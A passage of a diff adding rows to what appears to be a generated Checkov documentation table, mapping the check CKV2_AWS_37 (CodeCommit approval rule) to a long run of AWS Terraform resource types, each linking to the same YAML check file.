+| 1253 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1254 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1255 | CKV2_AWS_37 | resource | aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1256 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1257 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1258 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1259 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1260 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1261 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1262 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1263 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1264 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1265 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1266 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1267 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1268 | CKV2_AWS_37 | resource | aws_opsworks_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1269 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1270 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1271 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1272 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1273 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1274 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1275 | CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1276 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1277 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1278 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1279 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1280 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1281 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1282 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1283 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1284 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1285 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1286 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1287 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1288 | CKV2_AWS_37 | resource | aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1289 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1290 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1291 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1292 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1293 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1294 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1295 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1296 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1297 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1298 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1299 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1300 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1301 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1302 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1303 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1304 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1305 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1306 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1307 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1308 | CKV2_AWS_37 | resource | aws_redshift_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1309 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1310 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1311 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1312 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1313 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1314 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1315 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1316 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1317 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1318 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1319 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1320 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1321 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1322 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1323 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1324 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1325 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1326 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1327 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1328 | CKV2_AWS_37 | resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1329 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1330 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1331 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1332 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1333 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1334 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1335 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1336 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1337 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1338 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1339 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1340 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1341 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1342 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1343 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1344 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1345 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1346 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1347 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1348 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1349 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1350 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1351 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1352 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1353 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1354 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1355 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | 
